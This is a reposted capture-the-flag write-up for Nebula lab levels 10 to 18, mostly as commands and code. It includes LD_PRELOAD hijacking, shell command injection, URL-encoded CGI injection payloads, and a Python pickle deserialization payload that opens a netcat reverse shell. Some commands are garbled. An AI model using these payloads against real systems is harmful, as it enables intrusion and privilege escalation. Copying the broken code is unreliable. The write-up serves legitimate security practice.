神刀安全网

My Nebula Write-up Part #2 [Flag 09-18]

Flag 09: will come back later

Flag 10:Try LD_DEBUG exploit race conditon

Exploit symbolic link and race condition

fill pipe and redirect to standard output

if we can block the setuid binary between the calls to access() and open(), which gives us lot of time. To block the process, we will fill the pipe fully and connect the stdout of flag10 to that pipe so that it blocks during the call to printf().

615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

flag11:

There are definitely other paths but this is the path i followedShould basically poison LD_PRELOAD

 export LD_PRELOAD=`python -c 'print "/x0a/bin/getflag"*4000'` Then run python -c 'print "Content-Length: 1/n"' | ./flag11 2>/dev/null 

Unfortunately it says getflag is executing on a non-flag account, this doesn’t counti think its some design flaw currently with level 11 as i saw similar comments by users having the same problem

Flag 12:OS command injection

 blah;/bin/getflag > /tmp/lv12;echo 1337 go do cat /tmp/lv12 

Flag13:does evil stuff similar to what malware does

we create a shared object and use LD_PRELOAD to hook getuid() call similar to keyloggers in windows environements hooking keyboard handler functions ?

Neat stuff ->

 cat getuid.c # include unistd.h uid_t getuid(void) {     return 1000; }  gcc -fPIC -shared -o newlib.so getuid.c  export LD_PRELOAD="/home/level13/newlib.so 

Your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Flag 14:abcdefghijklmnopqrstuvwxyz

 import sys result = "" ptr = 0 with open(sys.argv[1], "r") as f:     for c in f.read()[:-1]:         result += chr(ord(c) - ptr)         ptr += 1 print result 
 ./decrypt $(cat /home/flag14/token) cat decrypt.c int main (int argc, char*argv[]) {     for (int i = 0; i < strlen(argv[1]); i++)         printf("%c", argv[1][i] - i);     printf("/n"); } 

Flag 15:

 readelf -d flag15 | egrep "NEEDED|RPATH" 

come back later; wierd

Flag 16:

 $username =~ tr/a-z/A-Z/;  # converts to uppercase $username =~ s//s.*//; # strip everything after a space ->#The PARAMETER field modifies all to lower case ->#Now we know that all Char get converted to uppercase, so we are gonna create a bash script in tmp which executes getflag. ->#We cannot specify the absolute path but we can put wildchar path which the system will traverse through and find the right file ->#The file will be named as FLGET which executes get flag and writes output to a file flagc in tmp folder 

Putting it all together we construct the following command and url encode it

 ";//FLGET;" ->#This yields %22%3B%2F%2FFLGET%3B%22 and we pass it as username have problems when using firefox ^^^ ----- index.cgi?username=" </dev/null;flagvar=/tmp/flg16;${flagvar,,};# In the encoded format it is, index.cgi?username=%22%3C%2Fdev%2Fnull%3Bflagvar%3D%2Ftmp%2Fflg16%3B%24%7Bflagvar%2C%2C%7D%3B%23  This essentially stores value of /tmp/flg16 script which is upper case in flag variable then converts to lower case 

Reference http://wiki.bash-hackers.org/syntax/pe#case_modification

Flag 17

 import pickle import socket import os class payload(object):   def reduce(self):     comm = "rm /tmp/shell; mknod /tmp/shell p; nc 127.0.0.1 10008 0/tmp/shell"     return (os.system, (comm,)) payload = pickle.dumps( payload()) soc = socket.socket(socket.AFINET,socket.SOCKSTREAM) soc.connect(("127.0.0.1", 10007)) print soc.recv(1024) soc.send(payload) 

Straightforward to get the flag.

18:

 ulimit -a | grep files ulimit -Sn 50 python -c 'print "login test/r/n"*50+"shell/r/n"' | /home/flag18/flag18 -d test -v -v -v Overload file descriptor ?..didnt work well 

STUCK here

; will come back for Flag 9 and 15 :(

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » My Nebula Write-up Part #2 [Flag 09-18]

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮